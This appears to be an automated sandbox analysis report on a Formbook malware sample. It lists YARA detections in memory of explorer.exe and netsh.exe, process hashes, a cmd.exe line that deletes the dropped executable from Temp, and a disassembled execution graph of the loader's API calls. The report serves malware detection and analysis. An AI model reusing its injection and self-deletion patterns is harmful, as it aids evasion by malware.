                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:low

                        General

                        Target ID:3
                        Start time:13:16:01
                        Start date:29/11/2022
                        Path:C:\Windows\explorer.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Explorer.EXE
                        Imagebase:0x7ff618f60000
                        File size:3933184 bytes
                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:high

                        General

                        Target ID:4
                        Start time:13:16:33
                        Start date:29/11/2022
                        Path:C:\Windows\SysWOW64\netsh.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\netsh.exe
                        Imagebase:0x7ff7c72c0000
                        File size:82944 bytes
                        MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:high

                        General

                        Target ID:5
                        Start time:13:16:38
                        Start date:29/11/2022
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:/c del "C:\Users\user\AppData\Local\Temp\jsqqecy.exe"
                        Imagebase:0xd90000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Target ID:6
                        Start time:13:16:38
                        Start date:29/11/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7c72c0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:15%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:22.9%
                          Total number of Nodes:1272
                          Total number of Limit Nodes:22
                          execution_graph 3533 401cc1 GetDlgItem GetClientRect 3534 402a0c 18 API calls 3533->3534 3535 401cf1 LoadImageA SendMessageA 3534->3535 3536 4028a1 3535->3536 3537 401d0f DeleteObject 3535->3537 3537->3536 3538 401dc1 3539 402a0c 18 API calls 3538->3539 3540 401dc7 3539->3540 3541 402a0c 18 API calls 3540->3541 3542 401dd0 3541->3542 3543 402a0c 18 API calls 3542->3543 3544 401dd9 3543->3544 3545 402a0c 18 API calls 3544->3545 3546 401de2 3545->3546 3547 401423 25 API calls 3546->3547 3548 401de9 ShellExecuteA 3547->3548 3549 401e16 3548->3549 3550 401645 3551 402a0c 18 API calls 3550->3551 3552 40164c 3551->3552 3553 402a0c 18 API calls 3552->3553 3554 401655 3553->3554 3555 402a0c 18 API calls 3554->3555 3556 40165e MoveFileA 3555->3556 3557 401671 3556->3557 3558 40166a 3556->3558 3559 405ff6 2 API calls 3557->3559 3562 40217f 3557->3562 3560 401423 25 API calls 3558->3560 3561 401680 3559->3561 3560->3562 3561->3562 3563 405a49 40 API calls 3561->3563 3563->3558 3564 401ec5 3565 402a0c 18 API calls 3564->3565 3566 401ecc 3565->3566 3567 406087 5 API calls 3566->3567 3568 401edb 3567->3568 3569 401ef3 GlobalAlloc 3568->3569 3570 401f5b 3568->3570 3569->3570 3571 401f07 3569->3571 3572 406087 5 API calls 3571->3572 3573 401f0e 3572->3573 3574 406087 5 API calls 3573->3574 3575 401f18 3574->3575 3575->3570 3579 405c59 wsprintfA 3575->3579 3577 401f4f 3580 405c59 wsprintfA 3577->3580 3579->3577 3580->3570 3581 4023c5 3592 402b16 3581->3592 3583 4023cf 3584 402a0c 18 API calls 3583->3584 3585 4023d8 3584->3585 3586 4023e2 RegQueryValueExA 3585->3586 3590 402672 3585->3590 3587 402402 3586->3587 3588 402408 RegCloseKey 3586->3588 3587->3588 3596 405c59 wsprintfA 3587->3596 3588->3590 3593 402a0c 18 API calls 3592->3593 3594 402b2f 3593->3594 3595 402b3d RegOpenKeyExA 3594->3595 3595->3583 3596->3588 3597 404746 3598 404772 3597->3598 3599 404756 3597->3599 3600 4047a5 3598->3600 3601 404778 SHGetPathFromIDListA 3598->3601 3608 4055a0 GetDlgItemTextA 3599->3608 3604 40478f SendMessageA 3601->3604 3605 404788 3601->3605 3603 404763 SendMessageA 3603->3598 3604->3600 3606 40140b 2 API calls 3605->3606 3606->3604 3608->3603 3612 4040cb lstrcpynA lstrlenA 3291 40324f SetErrorMode GetVersion 3292 403285 3291->3292 3293 40328b 3291->3293 3294 406087 5 API calls 3292->3294 3295 40601d 3 API calls 3293->3295 3294->3293 3296 4032a0 3295->3296 3297 40601d 3 API calls 3296->3297 3298 4032aa 3297->3298 3299 40601d 3 API calls 3298->3299 3300 4032b4 3299->3300 3301 406087 5 API calls 3300->3301 3302 4032bb 3301->3302 3303 406087 5 API calls 3302->3303 3304 4032c2 #17 OleInitialize SHGetFileInfoA 3303->3304 3384 405cfb lstrcpynA 3304->3384 3306 4032ff GetCommandLineA 3385 405cfb lstrcpynA 3306->3385 3308 403311 GetModuleHandleA 3309 403328 3308->3309 3310 405819 CharNextA 3309->3310 3311 40333c CharNextA 3310->3311 3319 403349 3311->3319 3312 4033b2 3313 4033c5 GetTempPathA 3312->3313 3386 40321e 3313->3386 3315 4033db 3316 4033ff DeleteFileA 3315->3316 3317 4033df GetWindowsDirectoryA lstrcatA 3315->3317 3396 402c88 GetTickCount GetModuleFileNameA 3316->3396 3320 40321e 12 API calls 3317->3320 3318 405819 CharNextA 3318->3319 3319->3312 3319->3318 3323 4033b4 3319->3323 3322 4033fb 3320->3322 3322->3316 3326 40347d ExitProcess OleUninitialize 3322->3326 3483 405cfb lstrcpynA 3323->3483 3324 403410 3324->3326 3332 405819 CharNextA 3324->3332 3365 403469 3324->3365 3327 4035a1 3326->3327 3328 403492 3326->3328 3330 403644 ExitProcess 3327->3330 3336 406087 5 API calls 3327->3336 3329 4055bc MessageBoxIndirectA 3328->3329 3335 4034a0 ExitProcess 3329->3335 3334 403427 3332->3334 3340 403444 3334->3340 3341 4034a8 3334->3341 3338 4035b4 3336->3338 3339 406087 5 API calls 3338->3339 3342 4035bd 3339->3342 3344 4058cf 18 API calls 3340->3344 3486 405543 3341->3486 3345 406087 5 API calls 3342->3345 3347 40344f 3344->3347 3348 4035c6 3345->3348 3347->3326 3484 405cfb lstrcpynA 3347->3484 3351 4035e4 3348->3351 3359 4035d4 GetCurrentProcess 3348->3359 3349 4034c9 lstrcatA lstrcmpiA 3349->3326 3353 4034e5 3349->3353 3350 4034be lstrcatA 3350->3349 3352 406087 5 API calls 3351->3352 3355 40361b 3352->3355 3356 4034f1 3353->3356 3357 4034ea 3353->3357 3360 403630 ExitWindowsEx 3355->3360 3366 40363d 3355->3366 3494 405526 CreateDirectoryA 3356->3494 3489 4054a9 CreateDirectoryA 3357->3489 3358 40345e 3485 405cfb lstrcpynA 3358->3485 3359->3351 3360->3330 3360->3366 3426 40374e 3365->3426 3499 40140b 3366->3499 3367 4034f6 SetCurrentDirectoryA 3368 403510 3367->3368 3369 403505 3367->3369 3498 405cfb lstrcpynA 3368->3498 3497 405cfb lstrcpynA 3369->3497 3373 405d1d 18 API calls 3374 403540 DeleteFileA 3373->3374 3375 40354d CopyFileA 3374->3375 3381 40351e 3374->3381 3375->3381 3376 403595 3377 405a49 40 API calls 3376->3377 3379 40359c 3377->3379 3378 405a49 40 API calls 3378->3381 3379->3326 3380 405d1d 18 API calls 3380->3381 3381->3373 3381->3376 3381->3378 3381->3380 3382 40555b 2 API calls 3381->3382 3383 403581 CloseHandle 3381->3383 3382->3381 3383->3381 3384->3306 3385->3308 3387 405f5d 5 API calls 3386->3387 3389 40322a 3387->3389 3388 403234 3388->3315 3389->3388 3390 4057ee 3 API calls 3389->3390 3391 40323c 3390->3391 3392 405526 2 API calls 3391->3392 3393 403242 3392->3393 3394 405a01 2 API calls 3393->3394 3395 40324d 3394->3395 3395->3315 3502 4059d2 GetFileAttributesA CreateFileA 3396->3502 3398 402ccb 3425 402cd8 3398->3425 3503 405cfb lstrcpynA 3398->3503 3400 402cee 3401 405835 2 API calls 3400->3401 3402 402cf4 3401->3402 3504 405cfb lstrcpynA 3402->3504 3404 402cff GetFileSize 3405 402e00 3404->3405 3423 402d16 3404->3423 3406 402be9 33 API calls 3405->3406 3407 402e07 3406->3407 3410 402e43 GlobalAlloc 3407->3410 3407->3425 3506 403207 SetFilePointer 3407->3506 3408 4031d5 ReadFile 3408->3423 3409 402e9b 3412 402be9 33 API calls 3409->3412 3411 402e5a 3410->3411 3416 405a01 2 API calls 3411->3416 3412->3425 3414 402e24 3417 4031d5 ReadFile 3414->3417 3415 402be9 33 API calls 3415->3423 3418 402e6b CreateFileA 3416->3418 3419 402e2f 3417->3419 3420 402ea5 3418->3420 3418->3425 3419->3410 3419->3425 3505 403207 SetFilePointer 3420->3505 3422 402eb3 3424 402f2e 48 API calls 3422->3424 3423->3405 3423->3408 3423->3409 3423->3415 3423->3425 3424->3425 3425->3324 3427 406087 5 API calls 3426->3427 3428 403762 3427->3428 3429 403768 3428->3429 3430 40377a 3428->3430 3516 405c59 wsprintfA 3429->3516 3431 405be2 3 API calls 3430->3431 3432 40379b 3431->3432 3434 4037b9 lstrcatA 3432->3434 3436 405be2 3 API calls 3432->3436 3435 403778 3434->3435 3507 403a17 3435->3507 3436->3434 3439 4058cf 18 API calls 3440 4037eb 3439->3440 3441 403874 3440->3441 3443 405be2 3 API calls 3440->3443 3442 4058cf 18 API calls 3441->3442 3444 40387a 3442->3444 3445 403817 3443->3445 3446 40388a LoadImageA 3444->3446 3447 405d1d 18 API calls 3444->3447 3445->3441 3450 403833 lstrlenA 3445->3450 3453 405819 CharNextA 3445->3453 3448 4038b5 RegisterClassA 3446->3448 3449 40393e 3446->3449 3447->3446 3451 4038f1 SystemParametersInfoA CreateWindowExA 3448->3451 3481 403479 3448->3481 3452 40140b 2 API calls 3449->3452 3454 403841 lstrcmpiA 3450->3454 3455 403867 3450->3455 3451->3449 3456 403944 3452->3456 3457 403831 3453->3457 3454->3455 3458 403851 GetFileAttributesA 3454->3458 3459 4057ee 3 API calls 3455->3459 3461 403a17 19 API calls 3456->3461 3456->3481 3457->3450 3460 40385d 3458->3460 3462 40386d 3459->3462 3460->3455 3464 405835 2 API calls 3460->3464 3465 403955 3461->3465 3517 405cfb lstrcpynA 3462->3517 3464->3455 3466 403961 ShowWindow 3465->3466 3467 4039e4 3465->3467 3468 40601d 3 API calls 3466->3468 3518 4050b9 OleInitialize 3467->3518 3470 403979 3468->3470 3472 403987 GetClassInfoA 3470->3472 3475 40601d 3 API calls 3470->3475 3471 4039ea 3473 403a06 3471->3473 3474 4039ee 3471->3474 3477 4039b1 DialogBoxParamA 3472->3477 3478 40399b GetClassInfoA RegisterClassA 3472->3478 3476 40140b 2 API calls 3473->3476 3479 40140b 2 API calls 3474->3479 3474->3481 3475->3472 3476->3481 3480 40140b 2 API calls 3477->3480 3478->3477 3479->3481 3482 4039d9 3480->3482 3481->3326 3482->3481 3483->3313 3484->3358 3485->3365 3487 406087 5 API calls 3486->3487 3488 4034ad lstrcatA 3487->3488 3488->3349 3488->3350 3490 4034ef 3489->3490 3491 4054fa GetLastError 3489->3491 3490->3367 3491->3490 3492 405509 SetFileSecurityA 3491->3492 3492->3490 3493 40551f GetLastError 3492->3493 3493->3490 3495 405536 3494->3495 3496 40553a GetLastError 3494->3496 3495->3367 3496->3495 3497->3368 3498->3381 3500 401389 2 API calls 3499->3500 3501 401420 3500->3501 3501->3330 3502->3398 3503->3400 3504->3404 3505->3422 3506->3414 3508 403a2b 3507->3508 3525 405c59 wsprintfA 3508->3525 3510 403a9c 3511 405d1d 18 API calls 3510->3511 3512 403aa8 SetWindowTextA 3511->3512 3513 403ac4 3512->3513 3514 4037c9 3512->3514 3513->3514 3515 405d1d 18 API calls 3513->3515 3514->3439 3515->3513 3516->3435 3517->3441 3526 404003 3518->3526 3520 4050dc 3524 405103 3520->3524 3529 401389 3520->3529 3521 404003 SendMessageA 3522 405115 OleUninitialize 3521->3522 3522->3471 3524->3521 3525->3510 3527 40401b 3526->3527 3528 40400c SendMessageA 3526->3528 3527->3520 3528->3527 3531 401390 3529->3531 3530 4013fe 3530->3520 3531->3530 3532 4013cb MulDiv SendMessageA 3531->3532 3532->3531 3613 402b51 3614 402b60 SetTimer 3613->3614 3615 402b79 3613->3615 3614->3615 3616 402bc7 3615->3616 3617 402bcd MulDiv 3615->3617 3618 402b87 wsprintfA SetWindowTextA SetDlgItemTextA 3617->3618 3618->3616 3627 402654 3628 402a0c 18 API calls 3627->3628 3629 40265b FindFirstFileA 3628->3629 3630 40267e 3629->3630 3633 40266e 3629->3633 3635 405c59 wsprintfA 3630->3635 3632 402685 3636 405cfb lstrcpynA 3632->3636 3635->3632 3636->3633 3637 4024d4 3638 4024d9 3637->3638 3639 4024ea 3637->3639 3646 4029ef 3638->3646 3640 402a0c 18 API calls 3639->3640 3642 4024f1 lstrlenA 3640->3642 3644 4024e0 3642->3644 3643 402672 3644->3643 3645 402510 WriteFile 3644->3645 3645->3643 3647 405d1d 18 API calls 3646->3647 3648 402a03 3647->3648 3648->3644 3649 4014d6 3650 4029ef 18 API calls 3649->3650 3651 4014dc Sleep 3650->3651 3653 4028a1 3651->3653 3659 4018d8 3660 40190f 3659->3660 3661 402a0c 18 API calls 3660->3661 3662 401914 3661->3662 3663 405620 70 API calls 3662->3663 3664 40191d 3663->3664 3665 4018db 3666 402a0c 18 API calls 3665->3666 3667 4018e2 3666->3667 3668 4055bc MessageBoxIndirectA 3667->3668 3669 4018eb 3668->3669 3166 40365c 3167 403677 3166->3167 3168 40366d CloseHandle 3166->3168 3169 403681 CloseHandle 3167->3169 3170 40368b 3167->3170 3168->3167 3169->3170 3175 4036b9 3170->3175 3176 4036c7 3175->3176 3177 403690 3176->3177 3178 4036cc FreeLibrary GlobalFree 3176->3178 3179 405620 3177->3179 3178->3177 3178->3178 3221 4058cf 3179->3221 3182 405654 3195 405789 3182->3195 3235 405cfb lstrcpynA 3182->3235 3183 40563d DeleteFileA 3184 40369c 3183->3184 3186 40567e 3187 405682 lstrcatA 3186->3187 3188 40568f 3186->3188 3190 405695 3187->3190 3236 405835 lstrlenA 3188->3236 3189 405ff6 2 API calls 3192 4057ae 3189->3192 3193 4056a3 lstrcatA 3190->3193 3194 4056ae lstrlenA FindFirstFileA 3190->3194 3192->3184 3196 4057ee 3 API calls 3192->3196 3193->3194 3194->3195 3200 4056d2 3194->3200 3195->3184 3195->3189 3198 4057b8 3196->3198 3197 405819 CharNextA 3197->3200 3199 4059b3 2 API calls 3198->3199 3201 4057be RemoveDirectoryA 3199->3201 3200->3197 3205 405768 FindNextFileA 3200->3205 3210 40572f 3200->3210 3216 405620 61 API calls 3200->3216 3240 405cfb lstrcpynA 3200->3240 3202 4057e0 3201->3202 3203 4057c9 3201->3203 3204 404fe7 25 API calls 3202->3204 3203->3184 3207 4057cf 3203->3207 3204->3184 3205->3200 3208 405780 FindClose 3205->3208 3209 404fe7 25 API calls 3207->3209 3208->3195 3211 4057d7 3209->3211 3213 4059b3 2 API calls 3210->3213 3212 405a49 40 API calls 3211->3212 3214 4057de 3212->3214 3215 405735 DeleteFileA 3213->3215 3214->3184 3220 405740 3215->3220 3216->3200 3217 404fe7 25 API calls 3217->3205 3218 404fe7 25 API calls 3218->3220 3220->3205 3220->3217 3220->3218 3241 405a49 3220->3241 3267 405cfb lstrcpynA 3221->3267 3223 4058e0 3224 405882 4 API calls 3223->3224 3225 4058e6 3224->3225 3226 405634 3225->3226 3227 405f5d 5 API calls 3225->3227 3226->3182 3226->3183 3233 4058f6 3227->3233 3228 405921 lstrlenA 3229 40592c 3228->3229 3228->3233 3230 4057ee 3 API calls 3229->3230 3232 405931 GetFileAttributesA 3230->3232 3231 405ff6 2 API calls 3231->3233 3232->3226 3233->3226 3233->3228 3233->3231 3234 405835 2 API calls 3233->3234 3234->3228 3235->3186 3237 405842 3236->3237 3238 405853 3237->3238 3239 405847 CharPrevA 3237->3239 3238->3190 3239->3237 3239->3238 3240->3200 3268 406087 GetModuleHandleA 3241->3268 3244 405ab1 GetShortPathNameA 3246 405ac6 3244->3246 3247 405ba6 3244->3247 3246->3247 3249 405ace wsprintfA 3246->3249 3247->3220 3248 405a95 CloseHandle GetShortPathNameA 3248->3247 3250 405aa9 3248->3250 3251 405d1d 18 API calls 3249->3251 3250->3244 3250->3247 3252 405af6 3251->3252 3275 4059d2 GetFileAttributesA CreateFileA 3252->3275 3254 405b03 3254->3247 3255 405b12 GetFileSize GlobalAlloc 3254->3255 3256 405b30 ReadFile 3255->3256 3257 405b9f CloseHandle 3255->3257 3256->3257 3258 405b44 3256->3258 3257->3247 3258->3257 3276 405947 lstrlenA 3258->3276 3261 405bb3 3263 405947 4 API calls 3261->3263 3262 405b59 3281 405cfb lstrcpynA 3262->3281 3265 405b67 3263->3265 3266 405b7a SetFilePointer WriteFile GlobalFree 3265->3266 3266->3257 3267->3223 3269 4060a3 3268->3269 3270 4060ad GetProcAddress 3268->3270 3282 40601d GetSystemDirectoryA 3269->3282 3273 405a54 3270->3273 3272 4060a9 3272->3270 3272->3273 3273->3244 3273->3247 3274 4059d2 GetFileAttributesA CreateFileA 3273->3274 3274->3248 3275->3254 3277 40597d lstrlenA 3276->3277 3278 40595b lstrcmpiA 3277->3278 3280 405987 3277->3280 3279 405974 CharNextA 3278->3279 3278->3280 3279->3277 3280->3261 3280->3262 3281->3265 3283 40603f wsprintfA LoadLibraryA 3282->3283 3283->3272 3670 4025e2 3671 4025e9 3670->3671 3673 40284e 3670->3673 3672 4029ef 18 API calls 3671->3672 3674 4025f4 3672->3674 3675 4025fb SetFilePointer 3674->3675 3675->3673 3676 40260b 3675->3676 3678 405c59 wsprintfA 3676->3678 3678->3673 3679 403ae4 3680 403c37 3679->3680 3681 403afc 3679->3681 3682 403c88 3680->3682 3683 403c48 GetDlgItem GetDlgItem 3680->3683 3681->3680 3684 403b08 3681->3684 3688 403ce2 3682->3688 3696 401389 2 API calls 3682->3696 3764 403fb7 3683->3764 3685 403b13 SetWindowPos 3684->3685 3686 403b26 3684->3686 3685->3686 3689 403b43 3686->3689 3690 403b2b ShowWindow 3686->3690 3692 404003 SendMessageA 3688->3692 3738 403c32 3688->3738 3693 403b65 3689->3693 3694 403b4b DestroyWindow 3689->3694 3690->3689 3691 403c72 SetClassLongA 3695 40140b 2 API calls 3691->3695 3736 403cf4 3692->3736 3697 403b6a SetWindowLongA 3693->3697 3698 403b7b 3693->3698 3746 403f40 3694->3746 3695->3682 3699 403cba 3696->3699 3697->3738 3702 403b87 GetDlgItem 3698->3702 3715 403bf2 3698->3715 3699->3688 3703 403cbe SendMessageA 3699->3703 3700 40140b 2 API calls 3700->3736 3701 403f42 DestroyWindow EndDialog 3701->3746 3705 403b9a SendMessageA IsWindowEnabled 3702->3705 3708 403bb7 3702->3708 3703->3738 3704 403f71 ShowWindow 3704->3738 3705->3708 3705->3738 3707 405d1d 18 API calls 3707->3736 3709 403bc4 3708->3709 3710 403bd7 3708->3710 3711 403c0b SendMessageA 3708->3711 3719 403bbc 3708->3719 3709->3711 3709->3719 3713 403bf4 3710->3713 3714 403bdf 3710->3714 3711->3715 3717 40140b 2 API calls 3713->3717 3716 40140b 2 API calls 3714->3716 3750 40401e 3715->3750 3716->3719 3717->3719 3718 403fb7 19 API calls 3718->3736 3719->3715 3747 403f90 3719->3747 3720 403fb7 19 API calls 3721 403d6f GetDlgItem 3720->3721 3722 403d84 3721->3722 3723 403d8c ShowWindow EnableWindow 3721->3723 3722->3723 3767 403fd9 EnableWindow 3723->3767 3725 403db6 EnableWindow 3728 403dca 3725->3728 3726 403dcf GetSystemMenu EnableMenuItem SendMessageA 3727 403dff SendMessageA 3726->3727 3726->3728 3727->3728 3728->3726 3768 403fec SendMessageA 3728->3768 3769 405cfb lstrcpynA 3728->3769 3731 403e2d lstrlenA 3732 405d1d 18 API calls 3731->3732 3733 403e3e SetWindowTextA 3732->3733 3734 401389 2 API calls 3733->3734 3734->3736 3735 403e82 DestroyWindow 3737 403e9c CreateDialogParamA 3735->3737 3735->3746 3736->3700 3736->3701 3736->3707 3736->3718 3736->3720 3736->3735 3736->3738 3739 403ecf 3737->3739 3737->3746 3740 403fb7 19 API calls 3739->3740 3741 403eda GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3740->3741 3742 401389 2 API calls 3741->3742 3743 403f20 3742->3743 3743->3738 3744 403f28 ShowWindow 3743->3744 3745 404003 SendMessageA 3744->3745 3745->3746 3746->3704 3746->3738 3748 403f97 3747->3748 3749 403f9d SendMessageA 3747->3749 3748->3749 3749->3715 3751 4040bf 3750->3751 3752 404036 GetWindowLongA 3750->3752 3751->3738 3752->3751 3753 404047 3752->3753 3754 404056 GetSysColor 3753->3754 3755 404059 3753->3755 3754->3755 3756 404069 SetBkMode 3755->3756 3757 40405f SetTextColor 3755->3757 3758 404081 GetSysColor 3756->3758 3759 404087 3756->3759 3757->3756 3758->3759 3760 404098 3759->3760 3761 40408e SetBkColor 3759->3761 3760->3751 3762 4040b2 CreateBrushIndirect 3760->3762 3763 4040ab DeleteObject 3760->3763 3761->3760 3762->3751 3763->3762 3765 405d1d 18 API calls 3764->3765 3766 403fc2 SetDlgItemTextA 3765->3766 3766->3691 3767->3725 3768->3728 3769->3731 3770 401ae5 3771 402a0c 18 API calls 3770->3771 3772 401aec 3771->3772 3773 4029ef 18 API calls 3772->3773 3774 401af5 wsprintfA 3773->3774 3775 4028a1 3774->3775 3776 4019e6 3777 402a0c 18 API calls 3776->3777 3778 4019ef ExpandEnvironmentStringsA 3777->3778 3779 401a03 3778->3779 3781 401a16 3778->3781 3780 401a08 lstrcmpA 3779->3780 3779->3781 3780->3781 3782 401f67 3783 401f79 3782->3783 3792 402028 3782->3792 3784 402a0c 18 API calls 3783->3784 3785 401f80 3784->3785 3787 402a0c 18 API calls 3785->3787 3786 401423 25 API calls 3793 40217f 3786->3793 3788 401f89 3787->3788 3789 401f91 GetModuleHandleA 3788->3789 3790 401f9e LoadLibraryExA 3788->3790 3789->3790 3791 401fae GetProcAddress 3789->3791 3790->3791 3790->3792 3794 401ffb 3791->3794 3795 401fbe 3791->3795 3792->3786 3796 404fe7 25 API calls 3794->3796 3797 401423 25 API calls 3795->3797 3798 401fce 3795->3798 3796->3798 3797->3798 3798->3793 3799 40201c FreeLibrary 3798->3799 3799->3793 3814 401c6d 3815 4029ef 18 API calls 3814->3815 3816 401c73 IsWindow 3815->3816 3817 4019d6 3816->3817 3818 4014f0 SetForegroundWindow 3819 4028a1 3818->3819 3827 4043f5 3828 404421 3827->3828 3829 404432 3827->3829 3888 4055a0 GetDlgItemTextA 3828->3888 3830 40443e GetDlgItem 3829->3830 3837 40449d 3829->3837 3832 404452 3830->3832 3836 404466 SetWindowTextA 3832->3836 3840 405882 4 API calls 3832->3840 3833 404581 3886 40472b 3833->3886 3890 4055a0 GetDlgItemTextA 3833->3890 3834 40442c 3835 405f5d 5 API calls 3834->3835 3835->3829 3841 403fb7 19 API calls 3836->3841 3837->3833 3842 405d1d 18 API calls 3837->3842 3837->3886 3839 40401e 8 API calls 3844 40473f 3839->3844 3845 40445c 3840->3845 3846 404482 3841->3846 3847 404511 SHBrowseForFolderA 3842->3847 3843 4045b1 3848 4058cf 18 API calls 3843->3848 3845->3836 3852 4057ee 3 API calls 3845->3852 3849 403fb7 19 API calls 3846->3849 3847->3833 3850 404529 CoTaskMemFree 3847->3850 3851 4045b7 3848->3851 3853 404490 3849->3853 3854 4057ee 3 API calls 3850->3854 3891 405cfb lstrcpynA 3851->3891 3852->3836 3889 403fec SendMessageA 3853->3889 3857 404536 3854->3857 3859 40456d SetDlgItemTextA 3857->3859 3863 405d1d 18 API calls 3857->3863 3858 404496 3861 406087 5 API calls 3858->3861 3859->3833 3860 4045ce 3862 406087 5 API calls 3860->3862 3861->3837 3864 4045d5 3862->3864 3865 404555 lstrcmpiA 3863->3865 3866 404611 3864->3866 3874 405835 2 API calls 3864->3874 3875 404669 3864->3875 3865->3859 3867 404566 lstrcatA 3865->3867 3892 405cfb lstrcpynA 3866->3892 3867->3859 3869 404618 3870 405882 4 API calls 3869->3870 3871 40461e GetDiskFreeSpaceA 3870->3871 3873 404642 MulDiv 3871->3873 3871->3875 3873->3875 3874->3864 3876 4046da 3875->3876 3893 404871 3875->3893 3878 4046fd 3876->3878 3880 40140b 2 API calls 3876->3880 3904 403fd9 EnableWindow 3878->3904 3880->3878 3881 4046dc SetDlgItemTextA 3881->3876 3882 4046cc 3896 4047ac 3882->3896 3885 404719 3885->3886 3905 40438a 3885->3905 3886->3839 3888->3834 3889->3858 3890->3843 3891->3860 3892->3869 3894 4047ac 21 API calls 3893->3894 3895 4046c7 3894->3895 3895->3881 3895->3882 3897 4047c2 3896->3897 3898 405d1d 18 API calls 3897->3898 3899 404826 3898->3899 3900 405d1d 18 API calls 3899->3900 3901 404831 3900->3901 3902 405d1d 18 API calls 3901->3902 3903 404847 lstrlenA wsprintfA SetDlgItemTextA 3902->3903 3903->3876 3904->3885 3906 404398 3905->3906 3907 40439d SendMessageA 3905->3907 3906->3907 3907->3886 3908 4016fa 3909 402a0c 18 API calls 3908->3909 3910 401701 SearchPathA 3909->3910 3911 40171c 3910->3911 3913 4027cc 3910->3913 3911->3913 3914 405cfb lstrcpynA 3911->3914 3914->3913 3915 40287c SendMessageA 3916 4028a1 3915->3916 3917 402896 InvalidateRect 3915->3917 3917->3916 3918 40227d 3919 402a0c 18 API calls 3918->3919 3920 40228b 